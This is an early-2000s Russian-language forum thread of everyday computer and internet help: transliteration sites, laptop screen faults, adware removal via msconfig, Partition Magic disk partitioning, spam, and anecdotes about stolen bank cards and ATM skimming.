PDA

Просмотр полной версии : Интернет - советы, вопросы.


Страницы : [1] 2

Snw
30.07.2002, 01:30
как и где менять chmod?
расскажите как создать свою гостевую книгу
заранее спасибо

Invincible
30.07.2002, 01:39
Автор оригинала Snw
как и где менять chmod?
расскажите как создать свою гостевую книгу
заранее спасибо Ой, ну немножко не по теме ты задёшь вопрос... Но ничё, я просто дам совет.

С такими вопросами обращайся на вот этот форум: http://www.sitemaker.ru/forum/ там тебе подробно ответят.

SrgCo
10.09.2002, 12:26
У меньа в школе администратор отклучил доступ на все русское саыти... Помогите открить поялуста... Буду очень благодарен...:(

Eugenia
11.09.2002, 18:14
вот гад какой...... А чего это он такой у вас злой????

Borjan
12.09.2002, 10:48
............. точно , по шее ему надовать следовало-б .....:):):)

SrgCo
13.09.2002, 14:11
Da durak on...

Borjan
13.09.2002, 23:28
Да , дурак он и в Африке дурак ... к сожалению...

Invincible
14.09.2002, 00:23
Автор оригинала SrgCo
U men'a v shkole administrator otkluchil dostup na vse russkoe sayti... Pomogite otkrit' pojalusta... Budu ochen' blagodaren...:( Ну есть один способ, поставить администратору пива, желательно побольше... :)

Eugenia
14.09.2002, 04:17
Автор оригинала Invincible
Ну есть один способ, поставить администратору пива, желательно побольше... :)

и желательно с цианистым калием.......;)

Borjan
14.09.2002, 10:54
Автор оригинала Invincible
Ну есть один способ, поставить администратору пива, желательно побольше... :)
Какому админу проставлять нужно? Если тебе Invincible , то приезжай ко мне я тебе и пива и вина -сколько захочешь :) :) : ) , а если можешь помочь человеку - помоги .....;)

Invincible
14.09.2002, 15:48
Автор оригинала Borjan

Какому админу проставлять нужно? Если тебе Invincible , то приезжай ко мне я тебе и пива и вина -сколько захочешь :) :) : ) , а если можешь помочь человеку - помоги .....;) Да тому, который доступ на русские сайты закрыл... А насчёт помощи - это вполне реальный совет, не высосанный из пальца...

По-поводу других способов, то легальных способов нету... всё связано со взломом, несанкционированным проникновением и т.д.

SrgCo
14.09.2002, 16:04
Soyd'ot mne luboy put'...

Borjan
14.09.2002, 16:05
Тада усё ясно :) :) :) А насчёт приглашения Инвис , винца попить - остаётся в силе ;)

Invincible
14.09.2002, 16:15
Автор оригинала Borjan
Тада усё ясно :) :) :) А насчёт приглашения Инвис , винца попить - остаётся в силе ;) :cool: :) :)

Borjan
14.09.2002, 16:22
Автор оригинала Invincible
:cool: :) :)
не понял , если тебе вино не по вкусу мы здесь и другое чё-нить найдём;) А человеку помочь всё-таки нужно, вишь как мается бедняжка - даже на взломы согласен....:) :( :)

Invincible
14.09.2002, 17:30
Автор оригинала Borjan

не понял , если тебе вино не по вкусу мы здесь и другое чё-нить найдём;) А человеку помочь всё-таки нужно, вишь как мается бедняжка - даже на взломы согласен....:) :( :) Да не, дело не в этом, я то не против, вот только далековато :-)

Насчёт взлома, то тут я не помощник, да и рассказывать, что к чему зачем и почему - это просто глупо...

Borjan
14.09.2002, 21:46
Ну ты даёшь "далековато " - всего 3 тыс. км , или 2,5 часа на самолёте - за день можно обернуться туда и обратно...:) :) ;) Ну да ладно что-то мы "не по теме" пошли ..........;)

SrgCo
14.09.2002, 23:27
Da ladno nadeyus posle prazdnikov (a u nas ih esho 2-ve s polovinoy nedeli) budet konflikt ulajen... Maksimum prid'otsa kovo to gruzit'... Pust' oni gruzat Gaya (admin)

Starik
12.10.2002, 18:41
Нужен совет специалиста. Недавно мой lap-top стал выкидывать странные штуки. Ни с того ни с сего изображение на екране монитора вдруг изменилось - появились какие-то странные мелко-полосатые тени, вся графика приобрела полосатый вид, и т.п. Перепробовал все - переустановил драйвер, менял resolution, ну в обшем, сделал все, что в голову пришло. Не помогает. Вдруг все встало на свои места, через некоторое время опять та же история. И так несколько раз. Из-за чего ето может быть - из-за температуры, влажности (влажность здесь 100%), пыли, плесени?
Есть какие идеи???:hlp: :lam:

JeWish
17.10.2002, 01:39
По моему тебе надо выкидиват LAP top:att: :att:

Starik
17.10.2002, 06:09
Ага, и еше сказать куда...:figa:

JeWish
02.11.2002, 09:21
ага :bam: :bis: :bird: :bam:

Дмитрий
03.11.2002, 22:49
Трудно, чтолибо утверждать, но похоже, что ты прав в своих догадках о влажности.
В принципе такое поведение похоже на плохой контакт шлейфа с матрицей, хотя, я могу ошибаться.

Starik
27.11.2002, 22:43
Дали мне тут какую-то фигню, типа Contact/Control Cleaner & Lubricant. Не знаю, боязно как-то применять. Вдруг все накроется.:bam:

AlexDeRus
29.11.2002, 23:21
ty ne pervyi s takoi problemoi . u menya pervyi laptop tochno tak zhe nakrylsya. Kontakty monitora hrenovye, cleaner vryad li spaset polozhenie, remont budet stoit' dorogo. ya etu problemu reshil prosto, kupil desktop.

AlexDeRus
29.11.2002, 23:22
P.S. Dlya borzov za chistotu yazyka : Menya virtualnaya klaviatura prosto dostala, dva chasa neobhodimo chtoby naisat' chto nibud'.

Starik
30.11.2002, 03:10
Ты че, транслитом не пользуешся? Напечатал в латинице, нажал кнопку "транслит на русский", подредактировал - и всех делов то.

Mag
04.12.2002, 00:05
Автор оригинала Spectre
Ты че, транслитом не пользуешся? Напечатал в латинице, нажал кнопку "транслит на русский", подредактировал - и всех делов то.
А не в курсе почему ентот транслит иногда отдыхает?Такой облом напишешь уже всё,а оно тебе-:figa:
"Что делать?"(с)

Starik
04.12.2002, 00:20
Автор оригинала Mag

А не в курсе почему ентот транслит иногда отдыхает?Такой облом напишешь уже всё,а оно тебе-:figa:
"Что делать?"(с)

Не знаю как у тебя, а у меня работает без проблем. Кстати, есть еше одна хорошая программа www.cifirica.ru. Очень удобно, когда комп по-русски не разговаривает.

Mag
04.12.2002, 14:00
Автор оригинала Spectre


Не знаю как у тебя, а у меня работает без проблем. Кстати, есть еше одна хорошая программа www.cifirica.ru. Очень удобно, когда комп по-русски не разговаривает.

Проверь пожалуйста буквочки в ссылке-все ли на месте?Не пущауют меня сюда.:lam:

Дмитрий
04.12.2002, 16:35
Автор оригинала Mag


Проверь пожалуйста буквочки в ссылке-все ли на месте?Не пущауют меня сюда.:lam:
Мэг, попробуй ещё - это может изза провайдера проблемы, у меня такое было.:cool:

Mag
04.12.2002, 17:22
Автор оригинала Дмитрий

Мэг, попробуй ещё - это может изза провайдера проблемы, у меня такое было.:cool:
Я уже несколько раз пробовала,результат один и тот же.:figa:
У меня другой адрес есть,тоже выручает,когда нужно:
http://translit.ru/
Просто хотела взглянуть,может ентот удобнее. :frfr:

Starik
04.12.2002, 18:28
Автор оригинала Mag


Проверь пожалуйста буквочки в ссылке-все ли на месте?Не пущауют меня сюда.:lam:

Да я там лишнюю точку поставил после ru. Во ссылка:www.cifirica.ru

Дмитрий
04.12.2002, 20:31
Автор оригинала Spectre


Да я там лишнюю точку поставил после ru. Во ссылка:www.cifirica.ru
Привет Spectre, я проверял ссылку - работает.:cool:

Mag
05.12.2002, 00:02
Автор оригинала Spectre


Да я там лишнюю точку поставил после ru. Во ссылка:www.cifirica.ru

Ура заработaла!Spasibo!:ura:

nadia
08.12.2002, 22:28
Вот вам и с Новим годом...
В среду уставила банковскуиу карточку в рестаране, а еио украли...
Сделали на неио все рождественские покупли и хорошо, аз на $300!!!:)
Толко в пиатнитзу я обнаружила...
Полетела в банк, в магазин где они покупали вино и сигарети, и в политзиу.
Результат: банк верниот $250, а $50 штрафа будет (т.к. я позно заиавила?!), в водочном магазине есть видео етих индивидуалс, так политзиа начала раследование...
Мораль тои басни такова: хорошо заниматсиа благотворительностиу за свои счиот ызнав об етом "апослиа" :)
Спасибо что вислужали...

GinGer
08.12.2002, 23:48
Искренне сочуствую!

Но вообще-то это плохой банк. Заводите такие карточки, где нет штрафа.

У меня несколько раз такое было - все вернули до копейки.

Borjan
09.12.2002, 01:48
Автор оригинала nadia75
Vot vam i s Novim godom...
Moral' toi basni takova: horosho zanimatsia blagotvoritel'nostiu za svoi schiot yznav ob etom "aposlia" :)
Spasibo chto visluzhali...
Да уж , "хороший" подарочек тебе предподнесли ...:bur2:

Relmax
09.12.2002, 03:02
Автор оригинала nadia75
Vot vam i s Novim godom...
V sredu ustavila bankovskuiu kartochku v restarane, a eio ukrali...
Sdelali na neio vse rozhdestvenskie pokupli i horosho, az na $300!!!:)
Tolko v piatnitzu ya obnaruzhila...
Poletela v bank, v magazin gde oni pokupali vino i sigareti, i v politziu.
Rezul'tat: bank verniot $250, a $50 shtrafa budet (t.k. ya pozno zaiavila?!), v vodochnom magazine est' video etih individuals, tak politzia nachala rasledovanie...
Moral' toi basni takova: horosho zanimatsia blagotvoritel'nostiu za svoi schiot yznav ob etom "aposlia" :)
Spasibo chto visluzhali...

У меня по Инету стянули карточку, точнее взломали сайт какого-то магазина, где я покупал что-то, а хозяин магазина - ... ... последний, не знает основ безопасности в Инете, то есть того, что НЕЛЬЗЯ хранить у себя на сервере карты клиентов, и тем более в незашифрованном виде...

И тоже банк 50 взял... А на 1000 пытались "купить"...

Надя, сочувствую, но ведь есть и положительная сторона - получишь новенькую карту вместо старой, наверняка малость потрепанной, а также избавишь мир от этих .... . Ну хотя бы на пару лет:-):evil:

GinGer
09.12.2002, 04:09
Автор оригинала Relmax

а также избавишь мир от этих .... . Ну хотя бы на пару лет:-):evil:

Шиш. В одном случае я точно знал, кто у меня стянул деньги с карточки: приемщица у дантиста списала номер. Причем была настолько тупа, что что-то заказала прямо себе на дом. Однако полиции просто был облом ее тащить в суд и сажать - так дело и заглохло. При этом мне все вернули, повторяю, хотя там сумма шла о тысяче баксов - нагрели в итоге продавца.

Я не совсем понимаю, за что у Вас-то взяли 50 баксов, если ваша карточка вообще физически не присутствовала? Ведь номер нашей карты знает любой продавец в универмаге, который ее берет, и если бы банки наказывали тех, чей номер использовали не по назначению, то вобще карточками пользоваться было бы невозможно.

Мораль сей басни - читайте все ваще стейменты очень внимательно. Если вы НЕ ЗАМЕТИЛИ чужой покупки, тогда получить деньги потом будет тяжелее.

Шипучка
09.12.2002, 04:58
GinGer
Вы тут ужасов наговорили. Про дантиста. Я теперь с чековой книжкой ходить буду.:D:

AlexDeRus
09.12.2002, 20:14
Твою чековуу книжку тоже могут спиз..ть . И подпись твоу запроста подделать. Так что платите всё в толко в наличных. Иногда неудобно, зато следов не оставляет. No papertrail.

nadia
09.12.2002, 20:37
100% soglasna!!!!
Osobenno beriot zlost' kogda moi obed stoil vsego $5.00!

Alevtina
10.12.2002, 00:37
Автор оригинала nadia75
Vot vam i s Novim godom... А у нас последние два дня на радио и по телевидению, и газеты только и говорили о том, как были обнаружены преступники, которые подделали около 3000 кредитных карточек из одной банковской сети. Им было этого мало! Они еще скрытые камеры поставили над банкоматами, чтобы считывать коды, которые владельцы карточек вводят, чтоб денежку снять. Ходила я в муниципалитет оплачивать воду. Там служащая рассказывала, что ее муж вдруг не нешел на счету 900 шекелей. Это приличная сумма.Ему вернули все до копейки. Ходят настойчивые предположения, что такую аферу мог прокрутить только один из служащих банка. Теперь людям предлагают не выбрасывать листы с информацией в банковскую урну, а лучше взять их с собой и где-то в другом месте их выбросить (а лучше съесть!:eek: ). А вынимая деньги из банкомата, прикрывать сверху руку так, чтобы не было возможности сверху снять твой код. Ужастик! А я как раз хотела деньги снять. Теперь только в банке буду это делать. Кто их знает, сколько еще банкоматов со скрытыми камерами стоят.

GinGer
10.12.2002, 01:53
Автор оригинала Alevtina
Теперь только в банке буду это делать. Кто их знает, сколько еще банкоматов со скрытыми камерами стоят.

Да ну Вас. Внимательно читайте стейтмент и вся недолга. Деньги же у Вас (точнее банка) могут украсть даже если Вы и пальцем не пошевелите. А если пользоваться наличкой, то ее можно потерять, могут отбрать грабители, или она може сгореть при пожаре.

Если уж пошла речь о кражах, расскажу историю, иллюстрирующую поговорку: "кому суждено утонуть, того не повесят".

Приехав в Америку купил я как-то фотокамеру за 200 баксов (тогда это были для меня заметные деньги). Положил ее по какому-то поводу в багажник машины, и надо так случиться, что машину в этот день украли. Машина была старая, мне выплатили страховку больше, чем она стоила, когда я ее покупал. За фотокамеру тоже заплатили.
Через месяца полтора машину нашли - оказывается воры покатались и бросили ее и она стояла все это время на какой-то стоянке. Поскольку мне за машину уже заплатили, то ее должна была забрать страховая компания, однако я поехал туда, открыл своим ключом багажник и нашел там свою камеру - воры даже багажника не трусили.

На той же неделе уже на новой машине я поехал в гости, хозяева жили в не очень хорошем районе, но я оставил машину на улице. Пока я был в гостях в машине разбили стекло и украли ту же самую камеру (на этот раз она была в бардачке). Интересно, что страховка заплатила за стекло и за украденную камеру опять.

Мораль: этой камере суждено было быть у меня украденной.

Relmax
10.12.2002, 02:27
Автор оригинала GinGer


Да ну Вас. Внимательно читайте стейтмент и вся недолга. Деньги же у Вас (точнее банка) могут украсть даже если Вы и пальцем не пошевелите. А если пользоваться наличкой, то ее можно потерять, могут отбрать грабители, или она може сгореть при пожаре.

Если уж пошла речь о кражах, расскажу историю, иллюстрирующую поговорку: "кому суждено утонуть, того не повесят".

Приехав в Америку купил я как-то фотокамеру за 200 баксов (тогда это были для меня заметные деньги). Положил ее по какому-то поводу в багажник машины, и надо так случиться, что машину в этот день украли. Машина была старая, мне выплатили страховку больше, чем она стоила, когда я ее покупал. За фотокамеру тоже заплатили.
Через месяца полтора машину нашли - оказывается воры покатались и бросили ее и она стояла все это время на какой-то стоянке. Поскольку мне за машину уже заплатили, то ее должна была забрать страховая компания, однако я поехал туда, открыл своим ключом багажник и нашел там свою камеру - воры даже багажника не трусили.

На той же неделе уже на новой машине я поехал в гости, хозяева жили в не очень хорошем районе, но я оставил машину на улице. Пока я был в гостях в машине разбили стекло и украли ту же самую камеру (на этот раз она была в бардачке). Интересно, что страховка заплатила за стекло и за украденную камеру опять.

Мораль: этой камере суждено было быть у меня украденной.

Погоди, может еще найдется?:):D: :D: :D: :lol: :lol: :lol: Может ей суждено как раз-таки то бегать от тебя, то возвращаться?;) :D: :lol: :p: :att: :bud: :git:

Alevtina
10.12.2002, 21:39
Автор оригинала GinGer


Да ну Вас. Внимательно читайте стейтмент и вся недолга. Деньги же у Вас (точнее банка) могут украсть даже если Вы и пальцем не пошевелите. А если пользоваться наличкой, то ее можно потерять, могут отбрать грабители, или она може сгореть при пожаре.

Если уж пошла речь о кражах, расскажу историю, иллюстрирующую поговорку: "кому суждено утонуть, того не повесят".

Приехав в Америку купил я как-то фотокамеру за 200 баксов (тогда это были для меня заметные деньги). Положил ее по какому-то поводу в багажник машины, и надо так случиться, что машину в этот день украли. Машина была старая, мне выплатили страховку больше, чем она стоила, когда я ее покупал. За фотокамеру тоже заплатили.
Через месяца полтора машину нашли - оказывается воры покатались и бросили ее и она стояла все это время на какой-то стоянке. Поскольку мне за машину уже заплатили, то ее должна была забрать страховая компания, однако я поехал туда, открыл своим ключом багажник и нашел там свою камеру - воры даже багажника не трусили.

На той же неделе уже на новой машине я поехал в гости, хозяева жили в не очень хорошем районе, но я оставил машину на улице. Пока я был в гостях в машине разбили стекло и украли ту же самую камеру (на этот раз она была в бардачке). Интересно, что страховка заплатила за стекло и за украденную камеру опять.

Мораль: этой камере суждено было быть у меня украденной. :lol: :lol: :lol: :lol: :lol: :lol: :lol: :lol: :lol:
А может быть она, как Карлсон, что улетел, но обещал вернуться!

Дмитрий
11.12.2002, 01:14
Автор оригинала Alevtina
:lol: :lol: :lol: :lol: :lol: :lol: :lol: :lol: :lol:
А может быть она, как Карлсон, что улетел, но обещал вернуться!
Оченьно похоже!:D:

AlexDeRus
11.12.2002, 01:19
Дмитрий,
ты я слышал сам то из купцов челночной гильдии будеш? И чем торгуем? Тебя еше не разу так предновогодне не накалывали?

Дмитрий
11.12.2002, 01:23
Автор оригинала AlexDeRus
Дмитрий,
ты я слышал сам то из купцов челночной гильдии будеш? И чем торгуем? Тебя еше не разу так предновогодне не накалывали?
Эт старая инфа. Я ноне тока лицом....:D:

AlexDeRus
11.12.2002, 01:28
Eto kak?

Дмитрий
11.12.2002, 01:31
Автор оригинала AlexDeRus
Eto kak?
Иногда с матами, а в основном... молча!:lol:

AlexDeRus
11.12.2002, 01:33
И что , получается? Много наторговал уже?

Дмитрий
19.12.2002, 00:28
Автор оригинала Mag


Ура заработaла!Spasibo!:ura:
И кудыб она делась!?:D:

Mag
19.12.2002, 00:30
Автор оригинала Дмитрий

И кудыб она делась!?:D:
Да долго же твоё письмо шло...Я уже и забыла об чём это мы!
Ты про путылочку?;)

Дмитрий
19.12.2002, 00:39
Автор оригинала Mag

Да долго же твоё письмо шло...Я уже и забыла об чём это мы!
Ты про путылочку?;)
Не про цифиричку! - луче поздно...:D:

Дмитрий
02.02.2003, 23:32
Советы, вопросы - в общем всё о "нём".:umn:

Дмитрий добавил(а) 1044218230:
Меня достал диалап и медлительность, а тут я нашёл статейку (правда по ХР) в которой говорилось мол:
gpedit.msc - ввести в командную строку и выполнить.
Перезагрузить.
Попробовал - вроде заработал быстрее. Может не один я этого не знал...:cool:

REmindER
03.02.2003, 20:04
Автор оригинала Дмитрий
Советы, вопросы - в общем всё о "нём".:umn:

Дмитрий добавил(а) 1044218230:
Меня достал диалап и медлительность, а тут я нашёл статейку (правда по ХР) в которой говорилось мол:
gpedit.msc - ввести в командную строку и выполнить.
Перезагрузить.
Попробовал - вроде заработал быстрее. Может не один я этого не знал...:cool:
Прости, а причем тут gpedit.msc? Эта утилита является редактором системных прав в ХР. Т.е. с помощью нее ты можешь выключить автостарт CD, например. А медлительность диал-апа заключается в максимальной пропускной способности протокола V.91. Существует протокол V.92, обладающий вдвое большей скоростью, но такого пока я не видел. Протокол V.91 подразумевает скорость доунлоада 57600 бит/сек и аплоада 38400 бит/сек. Максимальная скорость приема данных около 7 килобайт. На деле еще нужно отвести некоторую часть этого канала для работы самого траффика. В общем, можно попытаться использовать MarketScore - скорость действительно увеличивается на какой-то процент, но есть вероятность, что некоторые узлы откажут в сеансе (yandex.ru, например), т.к. имеют защиту доверенности.

Дмитрий
04.02.2003, 11:14
Я ужо писал, как-то, что я не умный - тока хочу таким быть, а про утилиту прочитал на новом ВООТ диске с ХР и попробовав - убедился, что скорость загрузки окон возросла примерно на 20\30%. Авторы объясняли это тем, что ХР резервирует какой-то канал под какую-то прогу, которой редко кто пользуется и этой строкой мона её отключать...:cool:

Eglantine
07.02.2003, 22:00
Все началось с того что мой любимый муж уехал вчера в Ирак, на неопределенное время и я вся слезах и в горе засела за компьютер, но и тут меня все раздражало и тут на глаза попался диск с играми и я решила присмотреть какую-нибудь новую игрушку себе. И результат случайно удалила папку Software с любимыми играми мужа и там еще какие-то программки были! Я хотела посмотреть новую игру и установила ее прямо в папку Software. Игра не понравилась и я загрузила Uninstall, компьютер меня спросил All, я ответила Да и он удалил всю папку!
Я была в шоке, но потом плюнула, сказала себе это не так страшно, что некоторые игры и программы я смогу найти в Инете и скачать, а остальное... Пошла я вчера бродить по Инету в поисках этих игр, что-то встречалось скачивала и скачала... теперь на панельке где часы появилась кнопка Music search Online, которую никак не могу удалить. Раньше когда я в Инет заходила открывалось окно мужа, а теперь выходит http://tdko.com/, меняла HomePage настройках Интернета, все равно меняется на эту страницу, да вообще она теперь постоянно выходит, когда поиск делаю или еще что, обычно это было через MSN. Еще кнопки с этой страницы были у меня на рабочем столе и в окне Интернета Favorate, я оттуда их удалила, но они все равно периодически вылазиют... Ужас какой-то, как мне эту страницу убрать и эти значки, чтоб они больше не вылазили..... :diablo:

ACOOLA
07.02.2003, 23:41
Автор оригинала eglantine
Все началось с того что мой любимый муж уехал вчера в Ирак, на неопределенное время и я вся слезах и в горе засела за компьютер, но и тут меня все раздражало и тут на глаза попался диск с играми и я решила присмотреть какую-нибудь новую игрушку себе. И результат случайно удалила папку Software с любимыми играми мужа и там еще какие-то программки были! Я хотела посмотреть новую игру и установила ее прямо в папку Software. Игра не понравилась и я загрузила Uninstall, компьютер меня спросил All, я ответила Да и он удалил всю папку!
Я была в шоке, но потом плюнула, сказала себе это не так страшно, что некоторые игры и программы я смогу найти в Инете и скачать, а остальное... Пошла я вчера бродить по Инету в поисках этих игр, что-то встречалось скачивала и скачала... теперь на панельке где часы появилась кнопка Music search Online, которую никак не могу удалить. Раньше когда я в Инет заходила открывалось окно мужа, а теперь выходит http://tdko.com/, меняла HomePage настройках Интернета, все равно меняется на эту страницу, да вообще она теперь постоянно выходит, когда поиск делаю или еще что, обычно это было через MSN. Еще кнопки с этой страницы были у меня на рабочем столе и в окне Интернета Favorate, я оттуда их удалила, но они все равно периодически вылазиют... Ужас какой-то, как мне эту страницу убрать и эти значки, чтоб они больше не вылазили..... :diablo:

зайди в "пуск", "найти" и создай поиск файла "Music search Online" по всем дискам (если у тебя их много) потом все что найдется - удали... вот... думаю и со всем остальным можно поступить так же... по крайней мере мне, когда что-то лишнее накачаю, помогает...

Eglantine
08.02.2003, 01:12
Уже пробовала поиск не находит ничего, еще какой-то значок появился. Теперь после всех моих лазаний пропали кнопки на панельке внизу около пуска :diablo:

Дмитрий
08.02.2003, 01:54
Автор оригинала eglantine
Уже пробовала поиск не находит ничего, еще какой-то значок появился. Теперь после всех моих лазаний пропали кнопки на панельке внизу около пуска :diablo:
Панель быстрого запуска, та что подле "пуск" включается в свойствах рабочей панели... Кликни на неё правой мышью и внимательно изучи меню. Удачи! :cool:

Eglantine
08.02.2003, 06:26
Спасибо за помощь, что-то я в стопоре каком-то была....:(

Mag
08.02.2003, 14:01
Автор оригинала eglantine
Спасибо за помощь, что-то я в стопоре каком-то была....:(
Как я тебя понимаю и сочувствую.На меня в таких случаях столбняк нападает,даже элементарные вещи в момент из головы улетучиваются.Стараюсь успокоится,а потом продолжать бороться с компом,но не всегда это удаётся,прибегаю чьей-нибудь помощи,если есть возможность.

REmindER
08.02.2003, 20:35
А что это за папка такая Software? Откуда она у вас?

REmindER добавил(а) 1044726112:
Если программа не удаляется, попробуйте в Menu-Run набрать msconfig, затем, во вкладке Startup посмотрите все программы, которые можно заподозрить, попробуйте отключать их по очереди. При этом вам придется перезагружать компьютер. Таким образом, определите какая имеено гадость это делает. В большинстве случаев, имя файла программы напоминает название самой программы. Затем просто найдите и удалите ее.

Eglantine
08.02.2003, 20:42
Да я незнаю на диске С была, сейчас она опять сама появилась, после того как я заново из Инета скачала RealPlay.

REmindER
08.02.2003, 20:43
Автор оригинала eglantine
Да я незнаю на диске С была, сейчас она опять сама появилась, после того как я заново из Инета скачала RealPlay.
Ничего не пойму. Обычно дефолтовской папкой считается Program Files.

Eglantine
08.02.2003, 20:51
Я тоже так всегда думала, пока не столкнулась с Windows XP, я незнаю некоторые программы почему-то в эту папку Software устанавливаються, а иногда приустановке мой муж сам перенапрявлял установку в эту папку....

REmindER
08.02.2003, 21:01
Автор оригинала eglantine
Я тоже так всегда думала, пока не столкнулась с Windows XP, я незнаю некоторые программы почему-то в эту папку Software устанавливаються, а иногда приустановке мой муж сам перенапрявлял установку в эту папку....
Странно. У меня пять версий ХР и ни один не создавал папку Software. В данном случае, наверное, уже ничто не поможет. Правда, я восстанавливал деинсталлированные программы Norton Uninstall Deluxe'ом. Вопрос только: а действует ли при обычном Uninstall Shield.

Eglantine
08.02.2003, 21:11
Я уже плюнула на восстановление, пробую найти и скачать с Инета то что можно, некоторые игры уже нашла, даже более новые и крякнула их.
А вот еще какая-то была программа Morpheus, незнаю для чего она была нужна, тоже потерлась и ещеу нас была программа The Print Shop Deluxe - мы в ней откртки поздравительные составляли, тоже потерлась :(

REmindER
08.02.2003, 21:14
Программа PTP Morpheus позволяет искать в сети MusicCity мультимедийные файлы, такие как музыка и видео.

Eglantine
08.02.2003, 21:21
Ой, а ее можно скачать с Инета или это уже:frfr:

REmindER
08.02.2003, 21:25
Автор оригинала eglantine
Ой, а ее можно скачать с Инета или это уже:frfr:
Конечно. На сайте downloads.com. Надо сделать ее поиск в категории in downloads. А вот с PaintShopDeluxe дело хуже. Она распространяется на CD.

Eglantine
08.02.2003, 21:34
Спасибо огромное за помощь, попрубую найти. А для открыток поищу, может на каком-нибудь CD найду.

REmindER
08.02.2003, 21:38
Автор оригинала eglantine
Спасибо огромное за помощь, попрубую найти. А для открыток поищу, может на каком-нибудь CD найду.
Я могу посмотреть на каком-нибудь пиратском сайте, но не гарантия, что там это окажется. Используйте какие-нибудь алтернативные программы типа Microsoft PictureIt!.

Eglantine
09.02.2003, 02:37
Спасибо огромное за помощь. Буду искать.

Дмитрий
09.02.2003, 12:42
По просьбе желающих...

Дмитрий добавил(а) 1044783978:
Этот файл надобно скопировать в папку уже установленной "GOZILLA" и запустив его проследить, чтоб он "распаковался" в ту-же папку.
Удачи!:D:

Toxy
15.02.2003, 21:11
Интернет - это большой сточный колодец, в который уходит куча денег. Хотя уже трудно представить как без него обойтись.

Дмитрий
18.02.2003, 00:37
Автор оригинала Toxy
Интернет - это большой сточный колодец, в который уходит куча денег. Хотя уже трудно представить как без него обойтись.
Токси - поменьше писимизьму! :D:

Toxy
18.02.2003, 09:08
Да чё-то я такое не в своём духе ляпнул.
Ну да ладно. Сказал, так сказал, обратно редактировать не буду.

Дмитрий
18.02.2003, 10:51
Автор оригинала Toxy
Да чё-то я такое не в своём духе ляпнул.
Ну да ладно. Сказал, так сказал, обратно редактировать не буду.
Правильно - ведь главное не чё вчера ляпнул, а в чём сёдня убеждён! :umn:

Ikarus
19.02.2003, 18:33
С oднoи стoрoны Инет-клевaя вещъ , мoжнo , нaпример с вaми пooбщaтъся , нaписaтъ пo мылу и т.д.
С другoи стoрoны - этo никем некoнтрoлируемaя сетъ .
Вoт меня тaк дoстaли эти спaммеры и хитители ел. aдресoв
... блин , устaл уже нaжимaтъ нa блoкирoвaние спaмoв , a oни пoд нoвыми aдресaми с тем же oптимизмoм .
Причем прoбoвaл дaже и-мaил пoменятъ нa свеженъкии , ничегo не пoмoгaет .

Ikarus
19.02.2003, 18:40
Цифрицa-Хoрoшa чертoвкa .
Я нa неи oстaнoвился пoсле прoбы всяких трaнслитoрoв , и сoветoв пo зaлезaнию в регистр .

Starik
19.02.2003, 18:48
Автор оригинала Ikarus
С oднoи стoрoны Инет-клевaя вещъ , мoжнo , нaпример с вaми пooбщaтъся , нaписaтъ пo мылу и т.д.
С другoи стoрoны - этo никем некoнтрoлируемaя сетъ .
Вoт меня тaк дoстaли эти спaммеры и хитители ел. aдресoв
... блин , устaл уже нaжимaтъ нa блoкирoвaние спaмoв , a oни пoд нoвыми aдресaми с тем же oптимизмoм .
Причем прoбoвaл дaже и-мaил пoменятъ нa свеженъкии , ничегo не пoмoгaет .

Мой совет, заведи себе емайл, который простым подбором не возмешь. Поставь фильтр - весь спам идет в Junkmail Box . Только те, кто в твоей адресной книге или Safe List попадают в Inbox . А дальше по обстоятельствам. За два года моего нового емайла я получил от силы ДВА спама, и то, кто то похитил их откуда то. Тех сразу же в Ignore.

Ikarus
02.03.2003, 13:21
Люди с oпытoм , пoдмoгите пoжaлуистa .
У меня вoт чегo :
Решил пoкумекaтъ с Пaртициями Хaрд-Дискa
(не рaди кaпризa) .
Естъ прoгрaммa Partition Magic 7.0
(ДOС-oвскии вaриaнт) .
Скaжем , будет у меня лoгические диски C,D,Е .
Предпoлoжим , нa C- я пoстaвил 98-и Виндoус .
Хoчу нa D пoстaвитъ oфис , a нa Е - всякие
прoгрaммы (не в тoм сутъ).
Другoи oперaтивнoи системы у меня нет .
Теoретически этo вoзмoжнo или нет ?
(Зa прaктикoи не беспoкoитесъ , слoмaю
все чтo угoднo).

Дмитрий
02.03.2003, 21:04
На сколько я знаю и пользуюсь Partition Magic 7.0, то он позволяет устанавливать до трёх одинаковых виндей :D: (в смысле пользующихся одним форматом - в данном случае Fat 32).
Рекомендую поставить и Воот Magic (обычно он идёт в комплекте с партишиком) - он поможет с корректным входом в разделы и возможность их кодирования.

Дмитрий добавил(а) 1046628451:
Да и ненадо ставить винду на D или Е - Partition Magic 7.0 способен создавать несколько загрузочных разделов которые будут помечены *, а Воот Magic при входе в раздел помечает его как С.

Ikarus
02.03.2003, 22:59
Воот Magic (обычно он идёт в комплекте с партишиком) - он поможет с корректным входом в разделы и возможность их кодирования
Кoдирoвaтъ всмысле пoлъзoвaтъся прoгрaммaми ? Или чтo ты пoд этим пoдрaзумевaешъ?
Бут Мaджик нaиду нa всяк пoжaрныи .
-------------------------
Т.е. имея Винды нa глaвнoм рaзделе
мoжнo будет зaпускaтъ прoги нa других рaзделaх ?
(фoрмaт ФAТ 32 будет нa всех)
---------------------------
И еще , прoсти Дмитрич зa нaгрузку ,
В пaртишике естъ oпция изменения рaзмерoв
клaстерa , этo для чегo ?

Дмитрий
03.03.2003, 02:04
1 - кодировать в смысле защищать вход паролем.
2- можно сделать три главных раздела. Во время работы будет виден только тот в котором находишься, а остальные скрыты.
3 - кластер - эт как порция, которую заглатывает комп за одно обращение к винту. Можно увеличить значение, но работать будет медленнее. (разве только у тя пень3 или выше, с udma 5)

Ikarus
03.03.2003, 06:45
A вaриaнтa вхoдитъ нa все три рaзделa нет?
--------------------
Уф , целыи денъ искaл этoт .
Не думaл чтo oн тaк спрятaн .
Нaше-е-е-е-л , 8-я в.
Небитыи сoфтик 23-х метрoвыи .

Дмитрий
03.03.2003, 13:53
Не знаю случаев когда требуется видеть сразу три винды, но ежели приспичило то можешь поставить 98se, а сверху натянуть ХР и при утановке выбирай любой свободный диск, но учти что при NTFS из SE не будет видна ХР, а из ХР можно и по SE полазить.

Ikarus
03.03.2003, 14:15
Вoбщем , нaчинaю пoнимaтъ принцип .
Нa кaждыи рaздел , нужнo пo Oси .
Пo другoму не пoлучится ,
тaк чтo ли ?
(a и прoчих у меня прoстo немa , гoрa с плечъ) .

Дмитрий
03.03.2003, 14:39
Что есть ось ОС чтоли? - так эт ты сам заговорил о необходимости установки нескольких ОС - я тока прокоментировал...
